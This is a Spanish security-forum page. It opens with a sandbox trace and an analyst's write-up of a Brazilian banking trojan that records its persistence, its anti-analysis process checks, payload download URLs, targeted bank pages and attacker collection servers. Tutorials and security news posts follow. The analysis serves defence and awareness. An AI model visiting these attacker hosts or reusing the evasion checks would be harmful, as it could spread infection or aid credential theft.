FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
IsDebuggerPresent() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
BitBlt() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,92) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\jsob.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(user32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(security.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETWORKAREA,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(ole32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary(C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(9078c) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(607a0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(6079c) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(c07e4) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(ws2_32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(ws2help.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(fwpuclnt.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETFONTSMOOTHINGTYPE,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetForegroundWindow() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\Msimtf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(c076e) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FindWindow(Shell_TrayWnd,(null)) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(MSCTF.Shared.MUTEX.IKG) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(ctfmon.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(u1210.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(SbieCtrl.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(wireshark.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(sniff_hit.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(VBoxTray.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(procexp.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(BSA.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(dumpcap.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(jsobs.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(PE Explorer (portable).exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(idag.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(notepad.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(EvO_DBG.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateToolhelp32Snapshot(TH32C2_SNAPPROCESS,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
QuerySystemInformation() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(System,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(smss.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(csrss.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(winlogon.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(services.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(lsass.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(VBoxService.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(svchost.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SbieSvc.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(explorer.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(VBoxTray.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(ctfmon.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(alg.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(idag.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(PE Explorer (portable).exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(notepad.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(EvO_DBG.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(Comprovante.pdf2.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(sniff_hit.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(jsob.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(procexp.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(Projeto.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(jsobs.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(u1210.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(BSA.EXE,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SbieCtrl.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(wireshark.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(dumpcap.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SandboxieRpcSs.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SandboxieDcomLaunch.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateFile(c:\wina\s33ass.txt) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]

Código [Seleccionar]

 Report generated with Buster Sandbox Analyzer 1.85 at 15:56:27 on 07/02/2013

 [ General information ]
   * File name: c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe

 [ Changes to filesystem ]
   * No changes

 [ Changes to registry ]
   * Modifies value "NukeOnDelete=00000001" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket
          old value empty
   * Creates value "jsob.exe=43003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C007200330032005C004500730063007200690074006F00720069006F005C0049006E006600650063007400330064005C0043006F006D00700072006F00760061006E00740065005C006A0073006F0062002E006500780065000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\RUN
                 binary data=C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\jsob.exe

 [ Network services ]
   * No changes

 [ Process/window/string information ]
   * Checks for debuggers.
   * Creates a mutex "CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "MSCTF.Shared.MUTEX.IKG".
   * Enumerates running processes.
   * Contains string Traces of AutoStart registry key ("Software\Microsoft\Windows\CurrentVersion\Run")
   * Contains string Checks for Chrome browser software presence ("CHROME.EXE")
   * Contains string Anti-Malware Analyzer routine: Norman Sandbox detection ("CurrentUser")
   * Contains string Checks for FireFox browser software presence ("FIREFOX.EXE")

Código [Seleccionar]

Report generated with Buster Sandbox Analyzer 1.85 at 15:56:27 on 07/02/2013

Detailed report of suspicious malware actions:

Anti-Malware Analyzer routine: Norman Sandbox detection
Checked for debuggers
Checks for Chrome browser software presence
Checks for FireFox browser software presence
Created a mutex named: CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: MSCTF.Shared.MUTEX.IKG
Defined registry AutoStart location created or modified: user\current\software\Microsoft\Windows\CurrentVersion\RUN\jsob.exe = 43003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C007200330032005C004500730063007200690074006F00720069006F005C0049006E006600650063007400330064005C0043006F006D00700072006F00760061006E00740065005C006A0073006F0062002E006500780065000000
Enumerated running processes
Traces of AutoStart registry key

Sigue...

#347

Análisis y Diseño de Malware / Troyano bancario

2 Febrero 2013, 11:29 AM

Este archivo me llegó a través del msn, de un "chica brasileña" que bien está infectada o intenta infectar. Nunca he hablado con ella pero me llega cada cierto tiempo.

URL de descarga: Pedir al moderador del foro o a mi.

Análisis online:

Anubis: http://anubis.iseclab.org/?action=result&task_id=13ce18b22910d4e84fd6779888568e7e9

VirusTotal: https://www.virustotal.com/file/82d34b76ed08587d62e78088f03e60ae5b868389f0d164c86a25b6fd23b8402a/analysis/1359671924/ (9/46)

Comprimido con UPX:

Peso comprimido: 118 KB
Peso descomprimido: 314 KB

Se inyecta en el proceso i.explore.exe y crea el proceso svchost.exe con la cuenta de admnistrador:

Desde el mismo servidor con otra cuenta de usuario descarga los siguientes archivos:

hxxps://s3-sa-east-1.amazonaws.com/manolomaias/jana.swf
hxxps://s3-sa-east-1.amazonaws.com/manolomaias/carla.swf
hxxps://s3-sa-east-1.amazonaws.com/manolomaias/mara.swf
hxxps://s3-sa-east-1.amazonaws.com/manolomaias/adriana.swf

Crea las carpetas Windows\Drivers en la ruta: C:\Documents and Settings\usuario\Datos de programa\Microsoft\

Created   0   C:\DOCUME~1\usuario\DATOSD~1\Microsoft\Windows
Modifed   0   C:\DOCUME~1\usuario\DATOSD~1\Microsoft
Created   0   C:\DOCUME~1\usuario\DATOSD~1\drivers

Crea los siguientes drivers:

Created   0   C:\DOCUME~1\usuario\DATOSD~1\drivers\rtl8194.vxd
Modifed   0   C:\Documents and Settings\usuario\Datos de programa\drivers
Modifed   F1800   C:\DOCUME~1\usuario\DATOSD~1\drivers\rtl8194.vxd
Created   0   C:\DOCUME~1\usuario\DATOSD~1\drivers\rtl745G.vxd
Modifed   0   C:\DOCUME~1\usuario\DATOSD~1\drivers
Modifed   99E00   C:\DOCUME~1\usuario\DATOSD~1\drivers\rtl745G.vxd
Created   0   C:\DOCUME~1\usuario\DATOSD~1\drivers\rtl2108.rtl
Modifed   12F000   C:\DOCUME~1\usuario\DATOSD~1\drivers\rtl2108.rtl
Created   7C00   C:\DOCUME~1\usuario\DATOSD~1\drivers\rtl3264.vxd

Crea el siguiente archivo:

Created   0   C:\Documents and Settings\usuario\Datos de programa\Microsoft\netA8335EC6security.cpl (100 MB)

Crea de nuevo otro driver:

Created 0 C:\Documents and Settings\usuario\Datos de programa\drivers\1ctrl2580.vxd
Modifed 1F C:\Documents and Settings\usuario\Datos de programa\drivers\1ctrl2580.vxd

Capturas de Process Monitor (lectura y creación de archivos/drivers):

Los archivos descargados inicialmente, aparentemente .swf simplemente son renombrados (los hash de archivo son idénticos):

Verifica cada poco tiempo la conexión a Internet desde Goolgle Brasil:

URL´s del proceso dumpeado "svchost":

hxxps://www2.bancobrasil.com.br/aapf/login.jsp?aapf.IDH=
hxxps://www2.bancobrasil.com.br/aapf/relacionamento/mcib.jsp
hxxps://internetbanking.caixa.gov.br/SIIBC/altera_endereco.processa
hxxps://internetbanking.caixa.gov.br/SIIBC/tipo_doc.processa
hxxps://internetbanking.caixa.gov.br/SIIBC/saldo.processa
hxxps://internetbanking.caixa.gov.br/SIIBC/tipo_doc.processa
hxxps://internetbanking.caixa.gov.br/SIIBC/index.processa
hxxps://www.citibank.com.br/BRGCB/JSO/signon/uname/HomePage.do
hxxps://www2.bancobrasil.com.br/aapf/includesSRP/processaVersionamentoAAPF.jsp?continuarVersaoAtual=sim
hxxp://www.it-eksperten.no/components/com_joomlawatch/log/error.php
hxxp://www.blackgreenfoods.com/plugins/system/error.php
hxxp://www.bb.com.br
hxxp://www.bb.com.br.pf/
hxxps://aapj.bb.com.br/aapj/login.br/SIIBC/index.pr
hxxps://aapj.bb.com.br/aapj/loginpfe.bb
hxxps://aapj.bb.com.br/aapj/loginmpe.bb
hxxps://aapj.bb.com.br/aapj/logingov.bb
hxxps://aapj.bb.com.br/aapj/loginpfe.bb
hxxp://www.santander.com.br
hxxp://www.bb.com.br.com.br
hxxp://www.bradesco.com.br
hxxp://64.120.134.60/1.php

hxxp://liviaeletro2012.com.br/animacao.gif
hxxp://www.liviaeletro2012.com.br/kid/1.php
hxxp://bacana2012.mail.ht/Kid2012/acesso.php./error

No he conseguido entrar al servidor ftp:
xftp://bacana2012.mail.ht/

Capturas de Wireshark:

Los procesos creados pueden ser eliminados sin problemas y no se vuelven a crear.

Aquí una de las web´s del log de Wireshark, donde quedan registrados y publicados todos los datos de los pc´s:

No he subido la imagen por contener datos privados que no creo sea conveniente publicar...

Mis datos de entrada publicados en la web:

# Windows XP # 8.0.6001.18702 # USUARIO # A8335EC6 # # IP # 2976 # 2013-02-01 # 04:23:39 # # # Brazil<br />
13 #
# Windows XP # 8.0.6001.18702 # USUARIO # A8335EC6 # # IP # 3884 # 2013-02-01 # 10:33:43 # # # Brazil<br />
1 #

La conclusión que he sacado es que se inyecta en el proceso i.explore.exe ayudado por el svchost.exe falso que contiene las url. Al cargar los drivers, se asegura que cada vez que obtenga datos del usuario relacionados con datos bancarios serán enviados a algun servidor.

Un saludo.

#348

Seguridad / Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección.

31 Enero 2013, 09:56 AM

#349

Noticias / Vulnerabilidad en cámaras TRENDnet todavía afecta a miles de usuarios

28 Enero 2013, 04:49 AM

Un año después de que se publicaran fallas en las cámaras de seguridad TRENDnet en el sitio de la BBC, todavía siguen apareciendo miles de usuarios afectados debido a la falta de concientización de los usuarios.

Estas cámaras de seguridad permiten hoy en día ser accedidas en forma remota desde prácticamente cualquier dispositivo con acceso a Internet. Una falla de seguridad descubierta por el creador del blog Console Cowboys 1 año atrás permitía poder visualizar de forma remota lo que capturaban las cámaras de dicha marca más allá que estuvieran protegidas con contraseña. De esta forma, y mediante búsquedas específicas, el dueño del blog pudo listar miles de equipos vulnerables a esta importante falla. A continuación se observa un ejemplo de una de las cámaras:

Aquí otro ejemplo, en este caso lo que parece ser una ventanilla de un banco:

Debido a la gran cantidad de cámaras encontradas y buscando la generación de conciencia el descubridor de la falla vinculó la información obtenida con la geolocalización de Google Maps para mostrar el verdadero impacto de su descubrimiento. A continuación se observan los resultados obtenidos:

La empresa TRENDnet, al enterarse de la falla, publicó una actualización del firmware para sus dispositivos afectados la cual recomendamos descarguen todos aquellos que posean un producto de esta marca. A su vez intentó contactar a sus clientes afectados, pero solo pudo dar aviso a aquellos que registraron sus cámaras dentro del sitio web de la empresa, los cuales solo representaban al 5% de los afectados.

Es por esto que a la fecha se siguen encontrando miles de equipos vulnerables a esta falla. A modo de recomendación, a todos aquellos que posean una de estas cámaras es de gran importancia que actualicen lo antes posibles el firmware de la misma y que también registren el producto dentro del sitio web del fabricante para poder estar al tanto de estos sucesos. Hasta entonces, lo que supuestamente se adquirió con el objetivo de tener más seguridad puede estar generando completamente lo opuesto.

Actualizar el firmware: http://www.trendnet.com/downloads/

Fuente: http://blogs.eset-la.com

#350

Seguridad / Reverse Engineering Mentoring enfocado al malware en Windows

19 Septiembre 2012, 00:28 AM

Curso online para el análsis de archivos enfocado a la ingeniería inversa de malware.
Consta de 4 módulos, incluye ejemplos prácticos con códigos para compilar y posteriormente decompliar y estudiar el ejecutable.
Se utilizan herramientas de código libre y sin restricciones, versiones free.

http://scratchpad.wikia.com/wiki/Reverse_Engineering_Mentoring:

http://scratchpad.wikia.com/wiki/Reverse_Engineering_Mentoring_Lesson_001
http://scratchpad.wikia.com/wiki/Reverse_Engineering_Mentoring_Lesson_002
http://scratchpad.wikia.com/wiki/Reverse_Engineering_Mentoring_Lesson_003
http://scratchpad.wikia.com/wiki/Reverse_Engineering_Mentoring_Lesson_004

Saludos.

#351

Seguridad / Cómputo Forense Reloaded - Porque todo deja rastro

15 Septiembre 2012, 01:45 AM

Video tutoriales sobre análisis forense de sistemas de la Campus Party:

1.-
[youtube=425,350]http://www.youtube.com/watch?v=fZ2kPqtFBEs[/youtube]

2.-
[youtube=425,350]http://www.youtube.com/watch?v=MkCCEYYrUGg&NR=1&feature=endscreen[/youtube]

La información no desaparece en el mayor de los casos...

#352

Seguridad / Evitar infecciones desde Java y FlashPlayer

3 Septiembre 2012, 15:18 PM

Abro éste tema para aquellos usuarios que no saben bien para que sirven estos programas, de los cuales se encuentran vulnerabilidades a diario y que al estar desactualizados pueden agravar la posibilidad de una infección del sistema.
También comentar que éstas vulnerabilidades pueden infectar desde el navegador las tres plataformas principales, Windows, Linux y Mac.
A través de una falla en Java por ejemplo se puede vulnerar un equipo independientemente de la plataforma utilizada. Los "atacantes" lo saben bien, la técnica es conocida como "drive-by-download" y tan sólo hace falta visitar un sitio previamente comprometido para caer en la red. De ésta forma se puede camuflar un troyano pasando inadvertido a muchas soluciones antivirus actuales, la aplicación se ejecuta con extensión ".jar" para pasar a cargarse en memória y finalmente crear un ejecutable cargado en el disco.
Para comprobar si tienes actualizados dichos programas puedes visitar su página oficial o bien visitar sitios web creados por algunas compañias para verificar si éstos componentes de tu sistema están actualizados a su última versión.

Comprobación en la web oficial:

Java: http://www.java.com/es/download/

FlashPlayer: http://get.adobe.com/es/flashplayer/
(Recuerda destildar el instalador de McAfee Security Scan si no lo quieres en tu sistema)

Comprobación en web anónima:

http://www.isjavaexploitable.com/

http://zulu.zscaler.com/research/java_version.html

Si quieres más información sobre Java y Flash:

Java: http://es.wikipedia.org/wiki/Java_%28lenguaje_de_programaci%C3%B3n%29

Flashplayer: http://es.wikipedia.org/wiki/Adobe_Flash_Player

Otros programas que nos pueden ayudar a buscar programas desactualizados:

Vulnerabilidades en el sistema:

http://secunia.com/vulnerability_scanning/online/

http://www.f-secure.com/en/web/home_global/protection/free-online-tools/free-online-tools

Vulnerabilidades en el navegador:

https://browsercheck.qualys.com/

https://www.botfrei.de/browsercheck/

También hay que destacar que si se encuentra una vulnerabilidad no parcheada (0-day) tanto en Java como en FlashPlayer se aconseja "desactivar" la aplicación por el momento hasta que se tenga una actualización disponible.

Saludos.

#353

Seguridad / Tutorial de análisis del PC con OTL de OldTimer.

10 Agosto 2012, 23:00 PM

Hola a todos, subo este tutorial para analizar el PC con la herramienta OTL de OldTimer con la que podremos generar un log y subir al foro. Es similar a la herramienta Hijackthis pero el log generado extrae más información. Discupad si hay algún error ortográfico, volveré a revisarlo.
El autor original es "emeraldnzl" y desde el foro de Infomalware junto con "Netsurfer" realizamos la traducción de la guia al español y algunas traducciones del propio programa.

Tabla de contenidos:

- Introducción.
- Enlace para descargar OTL.
- Información del resultado.
- Exploración estándar.
- Ejemplo de salida.
- Procesos.
- Modulos.
- Servicios.
- Controladores/Drivers.
- Registro estándard.
- Internet Explorer
- Firefox
- O1 a O22 incluyendo O24
- O10
- O27 Image File Execution Options
- O28 Shell Execute Hooks
- O29 Security Providers
- O30 Lsa
- O31 Modo seguro
- O32 Archivos Autorun en discos locales.
- O33 MountPoints2
- O34 BootExecute
- O35 shell spawning values
- O36 appcert dlls
- O37 Asociación de archivos.

- Pre-defined Custom Scan Command Example
- Quick Reference of available Directives & Commands

:processes
:OTL
:Services
:Reg
:Files
:Commands

Switches
Commands/Switches
CleanUp

OTL es una herramienta para el diagnóstico y la eliminación de malware.

Nota importante!: Aunque OTL es principalmente una herramienta de diagnóstico, la misma tiene una capacidad avanzada para eliminar programas maliciosos. Si usted no entiende las instrucciones en este tutorial, favor de solicitar la asistencia de un experto en la eiminación de programas maliciosos que ofrecen su ayuda gratis en uno de los foros que se indican abajo. Tenga mucho cuidado al desarollar y ejecutar uno de los códigos. El uso inapropiado de OTL puede causar la pérdida de sus datos o causar que éste no arranque.

Enlaces de descarga (versión actual 3.2.69.0):

http://oldtimer.geekstogo.com/OTL.exe

Para usuarios que no puedan ejecutar archivos con extensión .exe, pueden descargar OTL con una extensión .com o .scr que a efectos es lo mismo.

http://oldtimer.geekstogo.com/OTL.com
http://oldtimer.geekstogo.com/OTL.scr

Ejecutando OTL (ejecutar como administrador):

Ventana principal:

Configurando OTL para un análisis óptimo y/o personalizado:

Asegurese de cerrar todas sus ventanas antes de ejecutarlo y dejelo correr sin interrumpirlo asta que termine el Análisis.
Hacer doble click en el icono "OTL.exe" para ejecutarlo.
Cuando la ventana principal aparezca, marcar las siguienes opciones: Abajo de: "Tipo de Análisis" cambielo a Resultado Minimo.
Marcar las opciones: Buscar LOP y Buscar Purity.
Copia y pega el siguiente texto abajo de la barra azul de "Análisis Personalizados":

Código [Seleccionar] Expandir
netsvcs drivers32 %SYSTEMDRIVE%\*.* %systemroot%\*. /mp /s CREATERESTOREPOINT %systemroot%\system32\*.dll /lockedfiles %systemroot%\Tasks\*.job /lockedfiles %systemroot%\System32\config\*.sav %systemroot%\system32\drivers\*.sys /180 /md5start eventlog.dll scecli.dll netlogon.dll cngaudit.dll sceclt.dll ntelogon.dll logevent.dll iaStor.sys nvstor.sys atapi.sys IdeChnDr.sys viasraid.sys AGP440.sys vaxscsi.sys nvatabus.sys viamraid.sys nvata.sys nvgts.sys iastorv.sys ViPrt.sys eNetHook.dll ahcix86.sys KR10N.sys nvstor32.sys ahcix86s.sys nvrd32.sys /md5stop
Presione el boton Asegurarse de no cambiar el resto de la configuración a menos que te lo solicitemos, el análisis no tardará mucho.
Una vez termine se abrirán dos archivos, OTL.Txt y Extras.Txt. Éstos aparecerán grabados en el mismo lugar en que OTL.exe fue guardado.
Copiar y pegar el contenido del informe en el tema de tener que abrir uno en el foro.

Una vez que OTL haya completado su primer análisis, guardará una copia del resultado en un documento de texto y guardará en la misma carpeta donde se ejecutó. A menos que se incluya el informe "Extras" en la configuración, solamente se producirá el informe OTL.txt en escaneos siguientes.

En el caso del informe correspondiente a una reparación, el mismo se grabará en la carpeta:
_OTLMoved Files reflejando la fecha y hora en la que se crea. En la mayoría de los casos, C:_OTLMoved Files.

* Encabezado.

Este es un ejemplo del encabezado de un registro:

Código [Seleccionar] Expandir
OTL logfile created on: 10/08/2012 16:54:08 - Run 3 OTL by OldTimer - Version 3.2.56.0 Folder = C:\Documents and Settings\Administrador\Mis documentos\Descargas Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation Internet Explorer (Version = 8.0.6001.18702) Locale: 0000040A | Country: España | Language: ESP | Date Format: dd/MM/yyyy 2,00 Gb Total Physical Memory | 1,37 Gb Available Physical Memory | 68,38% Memory free 5,85 Gb Paging File | 5,07 Gb Available in Paging File | 86,76% Paging File free Paging file location(s): C:\pagefile.sys 4092 4092 [binary data] %SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Archivos de programa Drive C: | 99,83 Gb Total Space | 15,76 Gb Free Space | 15,78% Space Free | Partition Type: NTFS Drive D: | 170,60 Gb Total Space | 129,15 Gb Free Space | 75,70% Space Free | Partition Type: NTFS Drive F: | 195,32 Gb Total Space | 126,03 Gb Free Space | 64,53% Space Free | Partition Type: NTFS Drive G: | 3,80 Gb Total Space | 0,99 Gb Free Space | 26,09% Space Free | Partition Type: FAT32 Drive K: | 931,51 Gb Total Space | 473,93 Gb Free Space | 50,88% Space Free | Partition Type: NTFS Computer Name: DESKTOP | User Name: Administrador | Logged in as Administrator. Boot Mode: Normal | Scan Mode: Current user | Quick Scan Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days

Descripción del log generado por líneas:

Primera línea: Indica la fecha en que se creó el registro, la hora del día y cuantas veces OTL se a ejecutado.
Nota: la fecha se mostrará en el formato establecido por el usuario en el Panel de control.
